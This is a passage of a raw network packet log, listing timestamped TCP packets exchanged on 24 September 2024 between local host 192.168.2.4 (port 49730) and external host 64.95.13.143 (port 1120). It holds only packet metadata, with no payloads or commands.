Sep 24, 2024 17:46:10.976759911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976772070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976778030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.976783991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.976815939 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.976835012 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.977855921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977869987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977879047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977906942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977919102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977926016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.977930069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977943897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.977952003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.977967024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.979228973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.979237080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.979295969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.998286009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998347044 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.998353004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998364925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998409033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.998595953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998608112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998617887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998629093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.998644114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.998658895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.999178886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999193907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999206066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999264956 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.999703884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999716997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999727964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999739885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999749899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.999758005 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.999800920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.000507116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.000519037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.000530005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.000540018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.000551939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.000565052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.000586033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.001048088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.001060009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.001094103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.045062065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.053037882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053126097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053138971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053204060 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.053455114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053466082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053478003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053489923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.053497076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.053519011 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.059911966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.059922934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.059933901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.059983969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.059986115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.059997082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060008049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060022116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060046911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.060072899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.060583115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060671091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060682058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060693026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060703039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060709000 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.060715914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.060729980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.060761929 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.061391115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.061403036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.061414003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.061424971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.061435938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.061441898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.061446905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.061460972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.061491013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.062211037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.062222958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.062233925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.062243938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.062254906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.062266111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.062274933 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.062300920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.063077927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.063093901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.063107014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.063119888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.063133001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.063137054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.063159943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.064059019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064070940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064089060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064100027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064099073 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.064112902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064125061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.064127922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064140081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064151049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.064184904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.064641953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064717054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064735889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064747095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064758062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.064763069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.064779997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.065530062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.065541983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.065551996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.065562963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.065568924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.065576077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.065587044 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.065588951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.065615892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.066350937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066364050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066374063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066385031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066389084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.066396952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066409111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066409111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.066421032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.066441059 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.066457987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.067045927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067058086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067066908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067078114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067089081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067090988 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.067100048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067111015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067123890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.067142963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.067866087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067878962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067907095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.067986012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.067996979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068006039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068017006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068023920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.068027973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068044901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068044901 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.068056107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068070889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.068093061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.068938971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068950891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068960905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068972111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068981886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.068991899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069001913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069005013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.069013119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069031954 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.069047928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.069807053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069818974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069829941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069842100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069849968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.069852114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069863081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069874048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.069884062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.069911003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.091151953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091166019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091177940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091248035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.091299057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.091381073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091398954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091411114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091422081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091435909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.091454983 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.091963053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091974020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091989040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.091995001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092000008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092005968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092005968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.092010975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092030048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.092053890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.092816114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092828035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092839003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092849970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092859983 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.092860937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092873096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092883110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.092885017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.092900991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.092920065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.157989979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158015966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158027887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158077002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.158107042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158143044 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.158195972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158427000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158437967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158447981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.158463955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.158482075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.169042110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169069052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169081926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169107914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.169579029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169593096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169603109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169615030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169615030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.169627905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.169631958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.169673920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.169994116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170025110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170036077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170047045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170058012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170068979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170078039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.170763969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170775890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170785904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170794010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.170797110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170809031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170819044 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.170819998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170830965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.170875072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.170875072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.171550035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171560049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171571016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171591043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.171602011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171611071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171619892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.171624899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171636105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.171648026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.171674013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.172764063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172771931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172775030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172781944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172789097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172797918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172801018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.172821045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.172842026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.173271894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173319101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.173495054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173507929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173541069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.173691988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173753023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173768044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173774958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173777103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.173791885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.173811913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.174411058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.174423933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.174434900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.174447060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.174451113 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.174458981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.174477100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.174479961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.174508095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.175982952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.176032066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.176096916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.176109076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.176146030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.176969051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.176975965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.176983118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177021980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.177093029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177129984 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.177135944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177150011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177184105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.177604914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177615881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177625895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177640915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177649975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.177651882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.177673101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.181500912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.181559086 CEST	1120	49730	64.95.13.143	192.168.2.4
